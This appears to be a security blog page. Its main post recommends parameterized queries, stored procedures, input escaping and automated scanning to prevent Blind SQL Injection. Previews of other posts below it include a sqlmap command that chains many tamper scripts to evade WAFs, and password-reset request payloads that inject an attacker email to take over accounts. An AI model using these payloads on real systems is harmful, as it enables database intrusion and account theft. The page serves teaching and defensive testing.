Prevention of Blind SQL Injection

In most cases when a developer attempts to protect the website from classic SQL Injection poorly, the result is leaving space for Blind SQL Injections. Meaning if you turn off error reporting, a classic SQL Injection can become a Blind SQL Injection vulnerability.

How can you protect yourself from Blind SQL Injections:
  1. Use secure coding practices
    Be sure to use secure coding practices, independent of the programming language. All standard web development platforms (including PHP, ASP.NET, Java, and but also Python or Ruby ) have mechanisms for avoiding SQL Injections, including Blind SQL Injections. Try to avoid dynamic SQL at all costs. The best option is to use prepared queries, also known as parameterized statements. Also, you can use stored procedures that most SQL databases support (PostgreSQL, Oracle, MySQL, MS SQL Server). Additionally, escaping or filtering special characters (such as the single quote which is used for classic SQL Injections) for all user data inputs.
  2. Use automated testing solutions
    NeuraLegion’s solutions can detect both SQL Injection and Blind SQL injection vulnerabilities. Automatic regular scans will identify any new vulnerabilities which may not have been prevented or identified as noted above, or they may have occurred with new releases. Fully and seamlessly integrate application security testing automation into the SDLC, and empower your developers and QA to detect, prioritize and remediate security issues early, without slowing down DevOps pipeline.

Comments

Post a Comment

Popular posts from this blog

SQLMAP Tamper Scripts WAF bypass

Use and load all tamper scripts to evade filters and WAF: sqlmap -u ‘ http://www.site.com/search.cmd?form_state=1 ’ — level=5 — risk=3 -p ‘item1’ — tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords General Tamper testing: tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus...
Read more

Account Takeover: Password Reset With Manipulating Email Parameter

 Exploitation Add attacker email as second parameter using & 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com & email = attacker@email . com Copied! Add attacker email as second parameter using %20 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com % 20 email = attacker@email . com Copied! Add attacker email as second parameter using | 1 POST / resetPassword 2 [ ... ] 3 email = victim@email . com | email = attacker@email . com Copied! Add attacker email as second parameter using cc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dcc:attacker@mail.tld" Copied! Add attacker email as second parameter using bcc 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld%0a%0dbcc:attacker@mail.tld" Copied! Add attacker email as second parameter using , 1 POST / resetPassword 2 [ ... ] 3 email = "victim@mail.tld" , email = "attacker@mail.tld" Copied! Add attacker email as second parameter in json ar...
Read more

Different types of cross-site scripting attacks

Image
Stored (persistent) XSS Stored or persistent XSS attacks occur when the malicious scripts are permanently stored on the targeted server(s); this can occur in a database, on a message board, in comment fields, or on other user input pages. Victims receive a malicious script when the information is requested from the server. Reflected XSS A reflected attack occurs when the malicious script is not contained on the server but is included in the input sent to the server. Errors messages and search results are two commonly used vectors. These attacks are often delivered to the target via an email or on another site, often by tricking the target into choosing a link containing the malicious script or through user submitting the malicious form. The malicious code then reflects to the user's browser. This reflection causes the browser to believe that the script is trustworthy and prompts the browser to execute the script. DOM based attacks There is a third type of attack, known...
Read more